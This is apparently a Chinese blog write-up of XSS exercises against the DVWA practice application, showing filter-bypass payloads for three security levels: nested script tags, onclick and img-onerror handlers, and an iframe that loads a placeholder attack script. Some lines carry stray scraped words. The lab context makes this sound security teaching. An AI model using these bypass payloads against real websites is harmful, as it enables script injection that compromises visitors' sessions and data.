DVWA的Xss跨站总结
Xss跨站总结
初级防御的代码
Poc:<script>alert(1)</script>xss
上图防御的代码 为输入的结果就为输出的结果spa
中级防御的代码
Poc:<scri<script>pt>alert(1)</script>blog
上图为输入的文本中只要包含<script>就给替换成空ip
解决思路:<scri<script>pt>alert(1)</script> 在<script>中再添加一个<script> 后添加的<script>替换为空可是外面的<script>依旧能够拼接起来。iframe
高级防御的代码
图上为只要包含script就替换掉cli
解决方法:方法
<a href=” onclick=alert(‘xss’)>zet</a> #建立一个点击键zet点击后执行onclick=alert(‘xss’)im
<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)> #当错误时执行alert(‘xss’)error
<iframe width=300 height=100 src=”http://攻击脚本地址”></iframe>总结
相关文章
- 1. XSS跨站脚本小结
- 2. xss跨站***
- 3. DVWA的使用5–XSS(Reflected)(反射型跨站脚本)
- 4. DVWA的使用6--XSS(Stored)(存储型跨站脚本)
- 5. XSS跨站脚本攻击——在DVWA中的练习
- 6. dvwa-xss
- 7. DVWA XSS
- 8. DVWA-xss
- 9. XSS--DVWA
- 10. 【DVWA】XSS
- 更多相关文章...
- • Docker 资源汇总 - Docker教程
- • XML 总结 下一步学习什么呢? - XML 教程
- • 算法总结-双指针
- • 算法总结-回溯法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. XSS跨站脚本小结
- 2. xss跨站***
- 3. DVWA的使用5–XSS(Reflected)(反射型跨站脚本)
- 4. DVWA的使用6--XSS(Stored)(存储型跨站脚本)
- 5. XSS跨站脚本攻击——在DVWA中的练习
- 6. dvwa-xss
- 7. DVWA XSS
- 8. DVWA-xss
- 9. XSS--DVWA
- 10. 【DVWA】XSS